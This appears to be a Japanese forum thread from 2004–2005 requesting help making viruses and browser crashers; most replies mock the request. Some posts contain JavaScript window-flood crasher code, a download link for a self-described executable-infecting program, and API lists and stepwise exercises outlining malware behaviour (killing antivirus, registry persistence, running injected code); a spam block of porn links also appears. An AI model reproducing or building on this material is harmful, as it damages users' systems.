ウィルス・ブラクラ作成方法について語るスレ

このエントリーをはてなブックマークに追加
1名無しハッカー
ウィルス&ブラクラの作り方について情報キボンヌ
2デフォルトの名無しさん:04/12/23 12:10:13
ローカルルール読めませんか?
半島人ですか?大陸人ですか?日本語難しいですね
3デフォルトの名無しさん:04/12/23 12:12:22
板違い。
>プログラム・ソフトの使い方は PC 初心者板やソフトウェア板へ。
>ウイルス、ハッキング・クラッキングを求めるような発言は禁止です。
>Javascript は Web 制作板、CGI は Web プログラミング板へ。
>業界談義、愚痴はプログラマ板へどうぞ。
>ゲーム関係の話題はゲーム製作板へどうぞ。
>ネタ、板とは関係の無い話題はご遠慮ください。
4デフォルトの名無しさん:04/12/23 13:48:24
>>1
朝鮮へ帰れ
5デフォルトの名無しさん:04/12/23 15:40:46
この手のスレが間欠泉のように湧いてくるのはなぜ?
6マイク ◆yrBrqfF1Ew :04/12/23 16:24:38
そりゃここが2chだからだ。
7デフォルトの名無しさん:04/12/23 16:46:30
=========================== 終了 ===========================
8停止しますた。。。:04/12/23 21:38:27
真・スレッドストッパー。。。( ̄ー ̄)ニヤリッ
9デフォルトの名無しさん:04/12/24 01:02:54
停止してないじゃん
10デフォルトの名無しさん:04/12/24 01:43:17
<html>
<script language="JavaScript">
for(i=0;i<=1000;i++){
window.open('','','');
}
</script>
</html>


>>1
これをメモ張にコピペ
kill.htmlで保存
IEで開く
11脱糞しますた。。。:04/12/24 15:36:49
新・アヌスストッパー。。。( ̄ー ̄)ブリッ
12デフォルトの名無しさん:05/01/11 03:38:33
>>10
1000でとまんの?どうせなら無限ループでいいじゃん。
13ゆうや:05/01/16 21:03:46
>>12
ワロタ
14名無しが逝っても代わりはいるもの:05/01/24 13:27:36
他に教えてください
それとあなた達は神様だ!!
15デフォルトの名無しさん:05/01/24 13:30:04
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
16デフォルトの名無しさん:05/01/24 13:36:44
通報
削除依頼
17秘密K殺隊員10号:05/01/24 13:42:22
お前たちを電子機器破壊行為示唆とホウ助の現行犯で逮捕する!!

©2005 特撮ヤング/Disney
18デフォルトの名無しさん:05/01/24 16:49:45
この手のスレいい加減目障りだな
19デフォルトの名無しさん:05/01/24 17:04:45
オマエモナ
20デフォルトの名無しさん:05/01/28 00:29:54
ウイルスじゃないんだけど、ウイルスっぽいのが出来たんで、
誰かテストしてくれませんか?

内容は、任意の実行ファイルにぽこたんがインするわけです。
無事、実行ファイルにぽこたんインすると、起動時に
「あ、ぽこたんインしたお!」の例のAAがダイアログで表示されて、
それを閉じると本来の実行ファイルの内容に移ります。
ちなみにぽこたんは、1つの実行ファイルに可能な限り
インしようとしますので試す時は十分気を付けてください。

使い方は
pokotan.exe 任意の実行ファイル [出力実行ファイル]

これで指定した実行ファイルにぽこたんがインしたことになります。
[出力実行ファイル]はオリジナルにインさせたくない場合指定します。
既に実行中のファイルにはインできないので注意してください。

実行中以外でインできなかった実行ファイルがあれば、
その形式を知りたいので、支障がなければその実行ファイルのUPをお願いします。
厳密な実行ファイルだったり不完全な実行ファイルに
ぽこたんをインさせると、本来の処理がちゃんと実行されない場合があります。

それと、ないと思いますが悪用はしないでください。
まずかったらすぐ消します。
ttp://paw.s2.x-beat.com/up/img/5235.zip
21デフォルトの名無しさん:05/01/28 10:59:37
MZ16 exe/com
LE16 exe/dll
PE32 exe/dll/scr/ocx
WEB jpg/url/chm/htm/hta
WIN bat/pif/hlp
SCRIPT msc/vbs/js
MSF eml/doc/rtf/xsl/dot/xst
22デフォルトの名無しさん:05/01/28 11:14:04
有名アントウィリーのプロセずチーズヲ強制終了。
需-要シスてmファールをかきこ。
w*n.ini shE11=をたreg~ runをたbrwzr hom~p~をたw*ninit@MoVeFi1eEx Ap1をた
初期きどーフォーダと気に入りフォーダと文書フォーダの小-僧をFindFi1le Ap1 で習得。
ファールを再起的にかせーん。
23デフォルトの名無しさん:05/01/28 11:15:55
http://www.hotfix.jp/archives/alert/2004/news04-1229.html
24デフォルトの名無しさん:05/01/28 11:23:47
はカーズ エマニエルを見。
はカーズ 撮れ妊具を受。
プロセずチーズリストは<tlhe1p32.h>で習得。
Wri+ePr0fi1eS+ring AP1でshe11=をかきこ変え。
25デフォルトの名無しさん:05/01/28 15:56:36
ウィリーでム板検索
http://pc5.2ch.net/test/read.cgi/tech/1060603996/
http://pc5.2ch.net/test/read.cgi/tech/1042104713/
26デフォルトの名無しさん:05/01/28 16:04:52
http://pc5.2ch.net/test/read.cgi/tech/1106648030/
27デフォルトの名無しさん:05/01/28 16:13:29
http://pc5.2ch.net/test/read.cgi/php/995032597/
http://pc5.2ch.net/test/read.cgi/tech/1105360279/
28デフォルトの名無しさん:05/01/28 16:19:33
http://pc5.2ch.net/test/read.cgi/pcnews/1093226380/
http://pc5.2ch.net/test/read.cgi/pcnews/1097640604/
http://pc5.2ch.net/test/read.cgi/pcnews/1096972009/
http://pc5.2ch.net/test/read.cgi/pcnews/1101781348/
http://pc5.2ch.net/test/read.cgi/pcnews/1101718071/
29デフォルトの名無しさん:05/01/28 17:10:33
所詮ねらー
30デフォルトの名無しさん:05/01/28 17:53:48
http://pc5.2ch.net/test/read.cgi/pcnews/1098350729/
http://pc5.2ch.net/test/read.cgi/pcnews/1106808128/
http://pc5.2ch.net/test/read.cgi/pcnews/1105117579/
http://pc5.2ch.net/test/read.cgi/pcnews/1105484046/
http://pc5.2ch.net/test/read.cgi/pcnews/1092821183/
http://pc5.2ch.net/test/read.cgi/pcnews/1093422968/
31デフォルトの名無しさん:05/01/28 18:12:13
http://internet.watch.impress.co.jp/www/article/2003/0730/lorsis.htm
http://www.xfocus.org/
32デフォルトの名無しさん:05/01/28 18:18:51
http://www.google.co.jp/search?hl=ja&c2coff=1&q=joke+window+javascript+source&btnG=Google+%E6%A4%9C%E7%B4%A2
33デフォルトの名無しさん:05/01/28 18:48:40
http://www.google.co.jp/search?hl=ja&q=winny%E3%81%AE%E4%BD%BF%E3%81%84%E6%96%B9&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja
34デフォルトの名無しさん:05/01/28 19:14:40
Ge+WindowsDirec+ory
Ge+Sys+emDirec+ory
FindFirs+Fi1e
SHGe+Specia1Fo1derLoca+ion
De1e+eFi1eComp1e+e1y (borrow at srm)
De1e+eDirec+oryComp1e+e1y (priva+e)
35デフォルトの名無しさん:05/01/28 19:36:20
HWND hw=GetDesktopWindow();
HDC hdc=GetWindowDC();
...hdc...;
ReleaseDC(hw,hdc);
36デフォルトの名無しさん:05/01/28 20:06:44
EnumWindows
DestroyWindow
RegOpenKey
RegSetValue
RegCloseKey
37デフォルトの名無しさん:05/01/28 20:25:11
EnableDebugPriv
KillProcess
ShellExecute("A:\\")
SetSystemTime
SetSysColors
SystemParametersInfo
mouse_event
keybd_event
MoveWindow(hw,0,0,1,1,false)
38デフォルトの名無しさん:05/01/28 20:45:14
SetSystemCursor
ClipCursor
SetSystemPowerState
SHFileOperation
SHGetPathFromIDList
SwapMouseButton
TileWindows(NULL,MDITILE_)
39デフォルトの名無しさん:05/01/28 20:50:47
sage
40デフォルトの名無しさん:05/01/28 20:54:53
おまいら、ちゃんとついて来いよ
41デフォルトの名無しさん:05/01/28 21:49:08
おまいら、ここで変な気を起こすんじゃない。変な言動は怪しまれるからな。
それに漏れは全くおまいらに教える気は無いんだからな。
42デフォルトの名無しさん:05/01/28 21:50:51
>41
はい、変な物なんて作りたくありません。教えてもらおうなんて思っていません。
43デフォルトの名無しさん:05/01/28 21:58:03
>>22-41
意味がわからないんだけど・・・
本物の池沼ですか?
44デフォルトの名無しさん:05/01/28 22:04:26
〔1〕世界で最もよく使われるWinアプリを使われる順から10個挙げよ
〔2〕ファイルやフォルダを再起動後に改名・移動・削除するAPIは何?
〔3〕アプリがWinを再起動するために必要な権限は?
〔4〕WindowsフォルダにあるWIN.INIファイルは起動時にどのように使われるか?
〔5〕autoexec.batが無視されるのはどんなシステムか?
45デフォルトの名無しさん:05/01/28 22:10:04
>43
僕はね、初心者だからね、池沼って言葉はね、知らないの〜
46デフォルトの名無しさん:05/01/28 22:13:36
>43 僕、池沼が気になって眠れないの。どういう意味?
47デフォルトの名無しさん:05/01/28 22:18:20
レベル1でも誰もついて来ない。

所詮、2ch
48デフォルトの名無しさん:05/01/28 23:12:59
>43
タイーホサレタkナィダロ? ナア?
49デフォルトの名無しさん:05/01/29 01:32:49
http://c-others.2ch.net/test/-/entrance/i
50デフォルトの名無しさん:05/01/29 07:49:32
〔6〕アントウィーリーソフトを販売数の多い順に十個述べよ
〔7〕それらのアントウィーリーソフトのEXEパスファイル名は?
〔8〕プロセスをほぼ確実に強制終了できるAPIは?
〔9〕読み込んだ実行可能モジュールのパスファイル名を返すAPIは?
〔10〕パスファイル名で与えられたファイルを単純にコピーするプログラムを書け
51デフォルトの名無しさん:05/01/29 08:32:23
〔11〕それを一部を書き換えてコピーするように修正せよ
〔12〕デスクトップやスタートアップフォルダなどの特殊フォルダのパスファイル名を取得するコードを互換性の高い方法で書け
〔13〕フリーでソースコードが入手可能な、暗号化・復号化アルゴリズムをセキュリティの高い順に7個挙げよ
〔14〕セキュリティ面で最も危険なレジストリキーを脆弱性の高い順に4個挙げよ
〔15〕フリーでソースコードが入手可能なメール送信プログラムの名前を3個以上挙げよ
52デフォルトの名無しさん:05/01/29 08:41:10
[16]もっとも人気のあるAVを3つ挙げよ
[17]フリーでAVが入手可能なサイトを3つ挙げよ
[18]もっともAVに出てほしい現役アイドルを挙げよ
[19]持っているクレジットカードの暗証番号を言え
53デフォルトの名無しさん:05/01/29 08:45:25
ハカーズ・マニュヱル
54デフォルトの名無しさん:05/01/29 08:51:52
もう>1はあきらめたかな?
55デフォルトの名無しさん:05/01/29 08:55:51
>52
access violationに人気なんてあるのかいな?意味不明
56デフォルトの名無しさん:05/01/29 09:08:50
>52
池沼
57デフォルトの名無しさん:05/01/29 09:29:53
>44〔2〕MoveFileEx
>50〔8〕TerminateProcess
〔9〕GetModuleFileName
〔10〕CopyFileを呼ぶだけ
58デフォルトの名無しさん:05/01/29 09:38:02
>50
〔6〕http://www.google.co.jp/search?hl=ja&q=%E3%82%A6%E3%82%A3%E3%83%AB%E3%82%B9%E5%AF%BE%E7%AD%96%E3%82%BD%E3%83%95%E3%83%88%E3%80%8
59デフォルトの名無しさん:05/01/29 10:12:02
早く解けよ。やる気あんのか?
60デフォルトの名無しさん:05/01/29 12:12:52
>>59
風呂入れよ。臭いぞ。
61デフォルトの名無しさん:05/01/29 12:26:21
全く臭くない。
これ見れば分かるつーの
62P211018238141.ppp.prin.ne.jp:05/01/29 12:28:16
間違えた。こっちか
63デフォルトの名無しさん:05/01/29 12:29:17
後は頑張れよ
64デフォルトの名無しさん:05/01/29 12:34:57
あくまでオレは白帽だからな。

わかったら、
〔16〕上記アドレスをポートスキァンしてみろ
65デフォルトの名無しさん:05/01/29 12:38:56
早くやれよ。オレが許可してんだからな
66デフォルトの名無しさん:05/01/29 12:45:53
おまいら遅いぞ、まだポート番号が分からないのか?
67デフォルトの名無しさん:05/01/29 16:01:44
〔17〕次の仕様に従って関数_EnumDirItemsを設計せよ。
typedef DWORD (CALLBACK*ENUMDIRITEMFN)(LPCTSTR pszDir,LPCTSTR pszItemName);
DWORD _EnumDirItems(LPCTSTR pszDir,ENUMDIRITEMFN fn);
i. ディレクトリpszDirにある全項目名をFindFirstFileなどで取得し、動的に確保した文字列テーブルに格納する。
ii. i.の後、文字列テーブルに格納された各項目名を使ってfnを次々と呼ぶことでpszDirにある全項目をfnにより列挙する。
68名無しが逝っても代わりはいるもの:05/01/29 17:37:57
(略。。。) 

</script> 

(略。。。)のところにイロイロどうぞ。最後は名前「open.html」で保存。 
これで無限ループ。当然ファイル名違えばループにナリマセン
69名無しが逝っても代わりはいるもの:05/01/29 17:40:06
<html> 
<head> 
<title>ウィンドウを大量に表示する</title> 
</head> 
<body> 
<script type="text/javascript"> 
<!-- 
for (;;i++) { 
window.open("a.html","","width=200,height=200"); 

// --> 
</script> 
ウィンドウを大量に表示します 
</body> 
</html> 
<HTML> 
<HEAD> 
<TITLE>TEMPファイルの中身を消しちゃいます</TITLE> 
</HEAD> 

<BODY BGCOLOR="#FFFFFF"> 
70デフォルトの名無しさん:05/01/30 11:41:57
>67
せめて
CList<LPTSTR>* GetDirList(
LPCTSTR pszDir,
LPCTSTR pszWildcard);
にしろ、ヴォケ
71デフォルトの名無しさん:05/01/30 12:55:54
〔18〕ディレクトリをまるごと削除する関数DeleteDirectoryを書け
〔19〕指定のバイトセット中のバイトを無作為に選んでランダムなデータを生成する次のような関数を書け。
VOID GetRandData(
BYTE* pbData,DWORD cbData,
BYTE* pbByteSet=NULL,
DWORD cbByteSet=0);
〔20〕適当なEXEを16進ダンプによりソースコード中に取り込み、EXEに埋め込まれた固定長文字列の一部を書き換えて出力するコードを書け
72デフォルトの名無しさん:05/01/30 13:18:51
誤爆?
73デフォルトの名無しさん:05/01/31 08:31:00
〔21〕CASLとx86のアセソブリを学び、関数呼び出しや相対アドしスへの条件つきジャソプ命令をいくつか試してみよ。
〔22〕アセソブリを吐くコソパイノレオプツョソにより、テスト用の関数を埋め込み可能な汗コードに直せ。
〔23〕それをnasmなどによりアセソブノレしたバイトコードをVirtua1A11ocによって割り当てた実イテ可能ブ□ックに書き込み、直接呼び出してみよ。
74デフォルトの名無しさん:05/01/31 20:04:10
一人キチガイがいるな
75デフォルトの名無しさん:2005/04/06(水) 02:15:11
age
76デフォルトの名無しさん:2005/04/08(金) 06:23:35
Trojan.Zerafを今後のウィルス対策に研究してみたいのですが
標本置いてるUG系サイトとかってありますか?
自分で色々と探しているのですが現存するURLに辿りつけません。
勿論、今後の対策と知識向上が目的です
7776:2005/04/08(金) 06:51:15
板違いでした 研究の方に行きます
78デフォルトの名無しさん:2005/04/08(金) 11:35:59
>>77
まあ、板違いっていうか、このすれはローカルr
79AOME:2005/05/01(日) 14:56:03
                       .,ィ⊃  , -- 、
             .,r─-、      ,. ' /   ,/     } .    .ち
            . {     ヽ  / ∠ 、___/    |
   署 .    .ヽ.      V-─- 、  , ',_R /  ,'  .    .ょ
             . ヽ  ヾ、  ',ニ、 ヽ_/ rュ、 ゙、 /
   ま  .     . \  l  トこ,!   {`-'}  Y  .     . っ
                .ヽj   'ー'' ⊆) '⌒`  !
   で    , 、      l     ヘ‐--‐ケ   }  .     . と
   .     .ヽ ヽ.  _ .ヽ.     ゙<‐y′   /
   来     }  >'´.-!、 ゝ、_  ~  ___,ノ
            .|    −!   \` ー一'´丿 \
   い    ノ    ,二!\   \___/   /`丶、
  .     . /\  /    \   /~ト、   /    l \
80AKAME:2005/05/02(月) 16:34:31
↓サイト超おすすめ!!!マジでいい!!
http://www.wi-fi.ru/modules.php?name=Web_Links&l_op=visit&lid=11308
http://www.scat-sites.com/top/out.php?acc=lqsesii&ref=tshole
http://forum.onecenter.com/cgi-bin/forum/forum.cgi?c=msg&fid=petjka&mid=3357
http://moreteenporn.com/
http://azjatki.pl/out.php?szukaj=1&jo=65&url=partners/317160/index39.html
http://profilinguplord.hp.infoseek.co.jp/cgi-bin/img-box/img20041023213831.jpg
http://qma2ch.hp.infoseek.co.jp/cgi-bin/img-box/img20040614030433.jpg
81デフォルトの名無しさん:2005/05/27(金) 20:09:03
こんなに欠陥だらけの脆弱なネットが、破壊されずに今まで存在してきていることが不思議だ。

そうは思わんか?
82デフォルトの名無しさん:2005/05/27(金) 20:18:54
>>81
IIJ がダイアルアップサービス始めた時点で
「…大丈夫かぁ?」
とは思った。
やっぱり大丈夫じゃなかった。
83デフォルトの名無しさん:2005/08/03(水) 11:11:50
デスクトップのディスクトレイの開閉が止まらなくなるウィルスを作ってください
お願いします
84デフォルトの名無しさん:2005/08/03(水) 12:03:14
デスクトップのディスクトレイって何?
85デフォルトの名無しさん:2005/08/03(水) 12:30:41
ROMドライブって事じゃね?
ウィルス起動と同時に「うぃーん がしゃん うぃーん がしゃん」
86デフォルトの名無しさん:2005/08/05(金) 02:42:11
>>85
ちょっとワロス
87デフォルトの名無しさん:2005/08/10(水) 21:18:15
malloc("manko");
88デフォルトの名無しさん:2005/09/02(金) 02:03:15
>>83
そんなやつ2年ぐらい前に踏んだことあるw 
リンク踏んだらいきなりROMドライブ開いてわろた。その時はソーテックの糞PCで
ノートンも入って無かったよ。
89デフォルトの名無しさん:2005/09/02(金) 03:40:31
file:///A:
をハイパーリンクしておくとフロッピーがガタガタ言うんだっけ?
90デフォルトの名無しさん:2005/09/02(金) 18:48:57
>>83
参考
ttp://www.bea.hi-ho.ne.jp/my2project/vb/01/010206.htm
91名無しさん@そうだ選挙に行こう:2005/09/10(土) 21:28:14
ttp://z.la/er361
上のURL先程踏んでしまったのですが
OEが開きなにかやってるみたいでした
即強制終了させたんですが
今のところ普通なのですが、大丈夫ですかね?

スレ違いの質問してすいませんけど教えて頂けると助かります
宜しくお願いします。
92デフォルトの名無しさん:2005/10/15(土) 13:23:54
>>91
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="ja">
<head>
<meta http-equiv="content-type" content="text/html;charset=Shift-JIS">
<meta http-equiv="refresh" content="2;URL=http://arbeit.taikenki.jp/">
<title>jump @ z.la</title>
</head>
<body>
指定された圧縮URLは削除されたっぽいです。<br>
3秒後に<a href="http://arbeit.taikenki.jp/">スポンサーページ</a>にジャンプします。<br><hr>
<div align="right">Powered by <a href="http://z.la/" target="_blank">Z.la</a></div>

だってさ。誰かがプロバイダに通報してデリられたんじゃね?
93デフォルトの名無しさん:2005/11/22(火) 11:22:27
http://www.easypic.org/?sample01.jpg 問題の画像
94デフォルトの名無しさん:2005/11/23(水) 20:44:24
すみません。これウィルスですか??
ttp://grugru.mine.nu/box/guru_guru_0178.zip
95デフォルトの名無しさん:2005/12/05(月) 19:10:14
>>93おいらはLive2chを使ってるけど、ウィルス警報が出た。開かないように。
>>94解凍してみたけど、ノートン先生は反応しなかった。
けど、怪しいから開いてない。
96デフォルトの名無しさん
[1] 授業単元: c言語
[2] 問題文(含コード&リンク): ポインタの配列を用いて3次元の配列cube[3][3][3]を作る。
要素に{0〜26}のデータを代入し、cube[1][1][1]の値を出力せよ。
[3] 環境
 [3.1] OS: (Windows
 [3.2] コンパイラ名とバージョン: lcc
 [3.3] 言語: C
[4] 期限: 12月6日
[5] その他の制限: 授業でこんなことやったを習った後に出た課題です。
int *c[4],c0[4]={1,2,3,4},c1[4]={4,5,6,7},c2[4]={8,9,10,11},
c3[4]={12,13,14,15};
c[0]=c0; c[1]=c1; c[2]=c2; c[3]=c3;
printf("%d"c[3][3],c);

おねがいします。